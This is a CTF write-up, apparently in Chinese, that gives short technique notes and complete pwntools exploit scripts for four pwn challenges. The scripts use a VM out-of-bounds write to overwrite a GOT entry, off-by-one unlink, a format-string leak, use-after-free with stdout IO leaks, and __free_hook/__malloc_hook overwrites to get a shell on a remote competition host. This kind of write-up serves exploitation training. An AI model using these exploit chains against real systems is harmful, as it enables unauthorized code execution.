misc

签到

linux中运行下命令就出来flag了。

PWN

cpu_emulator

简单的vm题,stack可以越界写

首先free掉一个0x20大小的chunk,然后利用stack的越界写修改其fd到bss段上,并且将它的size改掉,避免重复进入该chunk。

接着申请到bss段上把buf置0,并将stack指针修改为got表中atoi的地址。

最后按位加减got表中atoi函数地址,改成system,再输入/bin/sh即可getshell。

from pwn import *
#context.log_level = 'debug'
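# `process("emulator")` was a local-debugging leftover: it spawned a child that
# is never used once `p` is rebound to the remote connection below.  Kept
# commented out, matching the `#p = process(...)` convention of the other
# scripts on this page.
#p = process("emulator")
p = remote("123.56.52.128","18236")
# libc as resolved for the *local* "emulator" binary; its symbol offsets are
# only meaningful if the remote target runs the same libc build.
libc = ELF("emulator").libc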
def input_code(size,data):
    """Select menu option 1 and upload one instruction buffer.

    Answers the ``>> `` prompt with ``1``, the ``instruction size:`` prompt
    with ``size`` (stringified) and the ``instruction:`` prompt with ``data``,
    each via ``sendline`` on the module-level tube ``p``.
    """
    exchange = (
        (">> ", "1"),
        ("instruction size:", str(size)),
        ("instruction:", data),
    )
    for prompt, answer in exchange:
        p.recvuntil(prompt)
        p.sendline(answer)
def run():
    """Select menu option 2 (execute the uploaded code) on the module-level tube ``p``."""
    menu_prompt, choice = ">> ", "2"
    p.recvuntil(menu_prompt)
    p.sendline(choice)
def command(x):
    """Shift ``x`` into the opcode position (bit 26 upward); no masking is applied."""
    opcode_shift = 0x1a
    return x << opcode_shift
def count1(x):
    """Keep the low 5 bits of ``x`` and place them at bit offset 21."""
    width, shift = 5, 21
    low_bits = x & ((1 << width) - 1)
    return low_bits << shift
def count2(x):
    """Keep the low 5 bits of ``x`` and place them at bit offset 16."""
    width, shift = 5, 16
    low_bits = x & ((1 << width) - 1)
    return low_bits << shift
def count3(x):
    """Keep the low 16 bits of ``x`` (immediate field, no shift)."""
    width, shift = 16, 0
    low_bits = x & ((1 << width) - 1)
    return low_bits << shift
def cmd(a,b,c,d):
    """Encode one VM instruction word and pack it with ``p64``.

    ``a`` goes through ``command`` (opcode field), ``b`` and ``c`` through
    ``count1``/``count2`` (5-bit fields at bits 21 and 16) and ``d`` through
    ``count3`` (16-bit immediate); the four pieces are summed.
    """
    word = command(a)
    word += count1(b)
    word += count2(c)
    word += count3(d)
    return p64(word)
# Hard-coded base from a local no-ASLR debug run; it feeds only the diagnostic
# print near the end and is never derived from a leak on the remote side.
libc.address = 0x7ffff79e2000
one = [0x4f3d5,0x4f432,0x10a41c]  # one-gadget offsets; unused in this script
# Two uploads with empty code.  Per the write-up a 0x20-byte chunk has to be
# freed before the out-of-bounds stack write; presumably these size choices
# (0xc8, 0x38) set that up -- not verifiable from this page.
code = ''
input_code(0xc8,code)
code = ''
input_code(0x38,code)
# First VM program.  Opcode numbers (8, 9, 0x2b, 0x23) are not documented on
# this page; per the write-up this program is the out-of-bounds stack write
# that redirects the freed chunk's fd into .bss and changes its size field.
code = ''
code += cmd(8,0,0,0x8000)*2
code += cmd(8,0,0,0x10)
code += cmd(8,9,1,0xb0)
code += cmd(8,9,2,0x20)
code += cmd(8,9,3,0x60)
code += cmd(8,9,4,0x21)
code += cmd(8,9,5,0x1)

code += cmd(0x2b,0,1,0)
code += cmd(8,0,0,0x1)
code += cmd(0x2b,0,2,0)

code += cmd(8,0,0,0x1)
code += cmd(0x2b,0,3,0)

code += cmd(9,0,0,0x2)
code += cmd(9,0,0,0x8)
code += cmd(0x2b,0,4,0)
code += cmd(8,0,0,0x1)
code += cmd(0x2b,0,5,0)
input_code(0xf00,code)
run()
code = ''
input_code(0xc8,code)

# Allocation that lands in .bss (write-up): 23 zero qwords clear the buffer
# and the last qword becomes the VM's stack pointer.  0x602058 is presumably
# the atoi GOT slot the write-up mentions -- confirm against the binary.
code = ''
input_code(0xc8,p64(0)*23+p64(0x602058))



# Another empty upload (size 0x300).
code = ''
input_code(0x300,code)
# Second VM program: byte-wise add/sub on the word the stack pointer now
# addresses, turning the atoi GOT entry into system (see write-up).
code = ''
code += cmd(0x23,9,0,2)
code += cmd(8,0,0,1)
code += cmd(0x2b,9,0,2)

code += cmd(0x23,9,0,1)
code += cmd(9,0,0,0x12)
code += cmd(0x2b,9,0,1)

code += cmd(0x23,9,0,0)
code += cmd(9,0,0,0x50)
code += cmd(0x2b,9,0,0)
input_code(0x400,code)
#gdb.attach(p,'b *0x400911')
print hex(libc.sym['system'])  # diagnostic only; depends on the hard-coded base above
run()
# The menu's number parser (atoi) now resolves to system, so the string is executed.
p.sendline("/bin/sh")
p.interactive()

lgtwo

存在off by one漏洞,利用该漏洞进行unlink操作将堆块操作地址指向bss段上,即可任意地址读写。

同时再向bss段上存放堆块地址的位置写入main_arena地址,利用上面的地址修改其低位,爆破到stdout进行ioleak。

接着向__free_hook中写入system函数地址即可getshell。

from pwn import *
#p = process("./pwn")
# Every tube operation gives up after one second, so a failed attempt raises
# instead of hanging the retry loop below.
context.update(timeout=1)
def exp():
    """Run one attempt of the lgtwo exploit against the remote service.

    Connects, performs the off-by-one -> unlink -> arbitrary-write chain
    described in the write-up above, and only continues to the
    __free_hook overwrite when the computed libc base is page-aligned
    (i.e. the partial-overwrite guess at stdout was right).  Any failure
    propagates as an exception to the module-level retry loop.
    """
    p = remote("123.56.52.128","45830")
    # Local ./pwn's libc; the offsets below assume the remote runs the same build -- confirm.
    libc = ELF("./pwn").libc
    def add(size,data='a'):
        # Menu 1: allocate `size` bytes holding `data`.
        p.recvuntil(">> ")
        p.sendline("1")
        p.recvuntil("size?")
        p.sendline(str(size))
        p.recvuntil("content?")
        p.sendline(data)
    def free(idx):
        # Menu 2: release entry `idx`.
        p.recvuntil(">> ")
        p.sendline("2")
        p.recvuntil("index ?")
        p.sendline(str(idx))
    def edit(idx,data):
        # Menu 4: overwrite entry `idx` with `data` (raw send, no trailing newline).
        p.recvuntil(">> ")
        p.sendline("4")
        p.recvuntil("index ?")
        p.sendline(str(idx))
        p.recvuntil("what is your new content ?")
        p.send(data)
    # Three 0xf8-byte chunks (entries 0-2).
    add(0xf8)
    add(0xf8)
    add(0xf8)
    # Fake chunk in entry 0 whose fd/bk point at 0x6020C0-0x18 / -0x10 (the
    # .bss area holding the chunk pointers, per the write-up), followed by one
    # byte past the buffer -- the off-by-one -- so freeing entry 1 unlinks
    # the fake chunk into .bss.
    edit(0,p64(0)+p64(0xf1)+p64(0x6020C0-0x18)+p64(0x6020C0-0x10)+'\x00'*0xd0+p64(0xf0)+'\x00')
    free(1)
    # Heap grooming.  Its exact purpose is not stated on the page; per the
    # write-up it leaves a main_arena pointer in one of the .bss entries.
    add(0x1e8)
    add(0xf8)#3
    add(0xf8)
    add(0xf8)
    free(3)
    edit(4,'\x00'*0xf0+p64(0x200)+'\x00')
    free(5)
    add(0xf8)#3
    add(0xf8)#5
    add(0xf8)
    free(5)
    edit(4,p64(0)+p64(0x6020C0-8))
    add(0xf8)
    # Presumably entry 0 now aliases the pointer table: write 0x6020c0 into
    # one slot and two bytes ('\x20\x26') over the low end of the following
    # pointer (the main_arena pointer from the write-up), aiming it at
    # stdout.  The unguessed ASLR bits are what the retry loop brute-forces.
    edit(0,'\x00'*0x18+p64(0x6020c0)+'\x20\x26')
    # IO leak (write-up): file flags 0xfbad1800 followed by three zero qwords.
    edit(1,p64(0xfbad1800)+p64(0)*3+'\x00')
    p.recvuntil(p64(0xfbad1800)+p64(0)*3)
    # 0x3C5600: distance from the leaked pointer to libc base for the target build.
    libc.address = u64(p.recv(8))-0x3C5600
    print hex(libc.address)
    # A page-aligned base means the stdout guess was right; otherwise give up
    # this connection and let the caller retry.
    if ((libc.address&0xfff) == 0):
        # Point an entry at __free_hook, write system there, then free a
        # chunk holding "/bin/sh" (write-up).
        edit(0,p64(0x6020c0)+p64(libc.sym['__free_hook']))
        edit(1,p64(libc.sym['system']))
        edit(6,'/bin/sh\x00')
        free(6)
        #gdb.attach(p)
        p.interactive()
    p.close()
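# Retry loop: each exp() call opens a fresh connection and returns (or raises)
# when its partial-overwrite guess at stdout is wrong.  Catch Exception rather
# than everything so Ctrl-C (KeyboardInterrupt) can still stop the loop; the
# loop also keeps going after a successful interactive session ends, since
# exp() does not report success.
while(1):
    try:
        exp()
    except Exception:
        print 'fail'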

EASY_ABNORMAL

湖湘杯的原题,利用name来进行泄漏,得到libc地址。在堆上布置好one_gadget地址并free两个堆块得到堆地址。

接着用后面函数劫持栈地址从而执行onegadget。

from pwn import *
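# `process("./pwn")` was a local-debugging leftover: it spawned a child that
# is never used once `p` is rebound to the remote connection below.  Kept
# commented out, matching the `#p = process(...)` convention of the other
# scripts on this page.
#p = process("./pwn")
# Local ./pwn's libc; the offsets used later assume the remote runs the same build.
libc = ELF("./pwn").libc
p = remote("123.56.52.128","10012")
# Format-string probe sent as the name; show_name() echoes it back later and
# the script parses the printed value (see write-up).
p.recvuntil("NAME")
p.send("%11$p")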
def add(data):
    """Menu option 2: submit ``data`` at the ``cnt:`` prompt on the module-level tube ``p``."""
    exchange = (("CHOICE :", "2"), ("cnt:", data))
    for prompt, reply in exchange:
        p.recvuntil(prompt)
        p.sendline(reply)
def free(idx):
    """Menu option 3: release the entry at index ``idx``."""
    choice, index = "3", str(idx)
    p.recvuntil("CHOICE :")
    p.sendline(choice)
    p.recvuntil("idx:")
    p.sendline(index)
def show():
    """Menu option 4: ask the service to print its entries; the caller reads the output."""
    menu_prompt, choice = "CHOICE :", "4"
    p.recvuntil(menu_prompt)
    p.sendline(choice)
def show_name():
    """Menu option 1: ask the service to print the stored name; the caller reads the output."""
    menu_prompt, choice = "CHOICE :", "1"
    p.recvuntil(menu_prompt)
    p.sendline(choice)
def backdoor(data):
    """Menu option 23333 (the author's "backdoor"): send ``data`` at the ``INPUT:`` prompt."""
    exchange = (("CHOICE :", "23333"), ("INPUT:", data))
    for prompt, reply in exchange:
        p.recvuntil(prompt)
        p.sendline(reply)
one = [0x45226,0x4527a,0xf0364,0xf1207]  # one-gadget offsets; only one[3] is used below
# The name was sent as "%11$p" earlier; show_name() echoes it after "INFO:",
# so the line presumably holds a libc pointer (0x20840 is its distance from
# the base on the target build) -- confirm.
show_name()
p.recvuntil("INFO:")
libc.address = int(p.recvline()[:-1],16)-0x20840
# Stage the one-gadget address inside a heap chunk (write-up), then free two
# chunks and use show() to read a heap pointer back from the "idx 2:" line
# (6 bytes, zero-padded to a qword).
add(p64(0)*3+p64(libc.address+one[3]))
add('aaa')
free(0)
free(1)
show()
p.recvuntil("idx 2:")
heap = u64(p.recv(6)+'\x00\x00')
# Per the write-up the "backdoor" option hijacks a stack address; heap+0x20
# is presumably where the staged gadget address sits -- confirm the offset.
backdoor(p64(0)*4+p64(heap+0x20))
p.interactive()

maj0rone

存在uaf,利用ioleak获得libc地址,然后修改__malloc_hook即可getshell。

from pwn import *
# Every tube operation gives up after one second, so a failed attempt raises
# instead of hanging the retry loop below.
context.update(timeout=1)
def exp():
    """Run one attempt of the maj0rone exploit against the remote service.

    Uses the use-after-free from the write-up to reach stdout for an IO
    leak, then targets __malloc_hook.  Continues past the leak only when
    the computed libc base is page-aligned (the partial-overwrite guess
    was right); any failure propagates as an exception to the
    module-level retry loop.
    """
    # Local ./pwn's libc; the offsets below assume the remote runs the same build -- confirm.
    libc = ELF("./pwn").libc
    p = remote("123.56.52.128","18523")
    #p = process("./pwn")
    def add(size):
        # Menu 1: answer the quiz prompt with 80, request `size` bytes,
        # then decline to start the game.
        p.recvuntil(">> ")
        p.sendline("1")
        p.recvuntil("please answer the question\n")
        p.sendline(str(80))
        p.recvuntil("______?")
        p.sendline(str(size))
        p.recvuntil("start_the_game,yes_or_no?")
        p.sendline('n')
    def free(idx):
        # Menu 2: release entry `idx`.
        p.recvuntil(">> ")
        p.sendline("2")
        p.recvuntil("index ?")
        p.sendline(str(idx))
    def edit(idx,data):
        # Menu 4: overwrite entry `idx` with `data` (raw send, no trailing newline).
        p.recvuntil(">> ")
        p.sendline("4")
        p.recvuntil("index ?")
        p.sendline(str(idx))
        p.recvuntil("__new_content ?")
        p.send(data)
    one = [0x45226,0x4527a,0xf0364,0xf1207]  # one-gadget offsets; only one[3] is used
    add(0x208)
    free(0)
    # Entry 0 stays editable after free (the UAF from the write-up); the
    # smaller allocations below are presumably carved from the same region
    # so edit(0) reaches their headers -- layout not verifiable from here.
    add(0x18)
    add(0x68)
    add(0x68)
    add(0x18)
    # Free entry 2 twice, writing 0xe1 at offset 0x18 of entry 0 in between.
    free(2)
    edit(0,'\x00'*0x18+p64(0xe1))
    free(2)
    # Restore 0x71 and partially overwrite the following pointer with
    # '\xdd\x25': the brute-forced stdout guess from the write-up.  The
    # unguessed ASLR bits are what the retry loop brute-forces.
    edit(0,'\x00'*0x18+p64(0x71)+'\xdd\x25')
    add(0x68)
    add(0x68)
    # IO leak (write-up): file flags 0xfbad1800 followed by three zero qwords.
    edit(6,'\x00'*3+p64(0)*6+p64(0xfbad1800)+p64(0)*3+'\x00')
    p.recvuntil(p64(0xfbad1800))
    p.recv(32)
    # 0x3C56A3: distance from the leaked (6-byte) pointer to libc base for the target build.
    libc.address = u64(p.recv(6)+'\x00\x00') -0x3C56A3
    print hex(libc.address)
    # A page-aligned base means the stdout guess was right; otherwise give up
    # this connection and let the caller retry.
    if ((libc.address&0xfff) == 0):
        free(2)
        # Point the freed chunk just below __malloc_hook, reclaim it with two
        # allocations, then write realloc+6 and the one-gadget address into
        # the hook area (write-up).
        edit(2,p64(libc.sym['__malloc_hook']-0x23))
        add(0x68)
        add(0x68)
        edit(8,'\x00'*0xb+p64(libc.sym['realloc']+6)+p64(libc.address+one[3]))
        #gdb.attach(p,'b malloc')
        # Trigger one more allocation so the hook fires.
        p.recvuntil(">> ")
        p.sendline("1")
        p.recvuntil("please answer the question\n")
        p.sendline(str(80))
        p.recvuntil("______?")
        p.sendline(str(0))
        p.interactive()
    p.close()
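# Retry loop: each exp() call opens a fresh connection and returns (or raises)
# when its partial-overwrite guess at stdout is wrong.  Catch Exception rather
# than everything so Ctrl-C (KeyboardInterrupt) can still stop the loop; the
# loop also keeps going after a successful interactive session ends, since
# exp() does not report success.
while(1):
    try:
        exp()
    except Exception:
        print 'fail'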